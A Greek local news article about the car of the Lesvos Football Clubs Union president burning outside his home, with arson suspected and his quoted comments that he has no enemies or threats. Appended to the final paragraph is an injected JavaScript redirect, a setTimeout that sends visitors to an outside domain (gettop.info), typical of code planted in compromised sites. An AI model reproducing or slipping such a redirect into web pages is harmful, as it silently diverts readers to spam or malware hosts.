Στις φλόγες το αυτοκίνητο του προέδρου της Ε.Π.Σ. Λέσβου

0
13

 

Στις φλόγες τυλίχθηκε το αυτοκίνητο του προέδρου της Ένωσης Ποδοσφαιρικών Σωματείων Λέσβου, Σταύρου Ψαρόπουλου,το οποίο ήταν σταθμευμένο έξω από το σπίτι του στη Βαρειά όταν λίγο μετά τις 4 το πρωί.

Ένας γείτονας αντιλήφθηκε τη φωτιά όταν βγήκε να δει τι συμβαίνει και ειδοποίησε τον πρόεδρο της ΕΠΣ Λέσβου. Κάλεσαν την Πυροσβεστική η οποία δεν έχει διευκρινίσει αν οφείλεται σε μηχανική βλάβη ή εμπρησμό αν και το δεύτερο σενάριο είναι το επικρατέστερο.

«Κατά τις 4:00 τα ξημερώματα με ειδοποίησαν, βγήκαμε έξω και πράγματι είχε ανάψει φωτιά μέσα στην καμπίνα του αυτοκινήτου, ένα δικάμπινο αγροτικό της συζύγου μου. Ειδοποιήσαμε την πυροσβεστική, σβήσαμε τη φωτιά αλλά είχε ήδη καταστραφεί η καμπίνα. Οι αρχές κάνουν έρευνες και περιμένουμε σε 2-3 μέρες τα αποτελέσματα. Το πίσω τζάμι ήταν σπασμένο. Το αυτοκίνητο ήταν από τις 8:30 εκεί και δεν είχε χρησιμοποιηθεί», τόνισε o κ. Ψαρόπουλος στον ΣΠΟΡ MF 94,6.

«Αν πράγματι είναι εμπρησμός, γιατί ενδέχεται να είναι από μέσα η ιστορία, τότε μπορώ να τον συνδέσω με κάτι άλλο. Πάντως ούτε σε κόντρες είχα έρθει, ούτε είχα δώσει ποτέ δικαιώματα, αλλά με αυτά που ακούμε κάθε μέρα… Αν είναι εμπρησμός για οποιονδήποτε λόγο δεν μπορώ να το καταλάβω. Να μου πουν ‘γιατί πήγες εδώ και δεν πήγες εκεί;’. Θέλω να ελπίζω πως δεν είναι εμπρησμός αλλά η λογική αυτό λέει. Αν τελικά είναι εμπρησμός, τότε τι να πούμε…», πρόσθεσε.

Όσο για το αν είχε δεχτεί απειλές ή είχε κάποιες ενδείξεις για πιθανό «χτύπημα» σε βάρος του, είπε: «Τοπικούς εχθρούς δεν έχω. Ούτε απειλές έχω δεχτεί, γι’ αυτό και μου φαίνεται λίγο παράξενο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here